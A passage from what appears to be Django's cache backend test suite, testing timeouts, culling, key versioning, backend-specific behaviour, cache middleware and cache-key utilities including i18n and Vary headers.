offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', 0)
self.assertEqual(cache.get('key1'), None)
cache.add('key2', 'ham', 0)
self.assertEqual(cache.get('key2'), None)
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertEqual(cache.get('key3'), None)
self.assertEqual(cache.get('key4'), None)
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertEqual(cache.get('answer1', version=2), None)
self.assertEqual(caches['v2'].get('answer1'), None)
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertEqual(caches['v2'].get('answer1', version=2), None)
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertEqual(cache.get('answer3'), None)
self.assertEqual(cache.get('answer3', version=1), None)
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertEqual(caches['v2'].get('answer3', version=1), None)
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertEqual(cache.get('answer4', version=2), None)
self.assertEqual(caches['v2'].get('answer4'), None)
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertEqual(caches['v2'].get('answer4', version=2), None)
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), None)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), None)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), None)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.get('answer', version=3), None)
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), None)
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2', version=3), None)
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertEqual(cache.get('answer', version=2), None)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(caches['custom_key'].get('answer1'), None)
self.assertEqual(caches['custom_key2'].get('answer1'), None)
caches['custom_key'].set('answer2', 42)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertEqual(cache.get("key1"), None)
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create the table
# 3: create the index
with self.assertNumQueries(3, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertEqual(caches['other'].get('value'), None)
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache in settings.CACHES.items():
if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
shutil.rmtree(self.dirname)
super(FileBasedCacheTests, self).tearDown()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnorePendingDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, DEFAULT_CACHE_ALIAS, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualfied URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertTrue(get_cache_key(request1) != get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
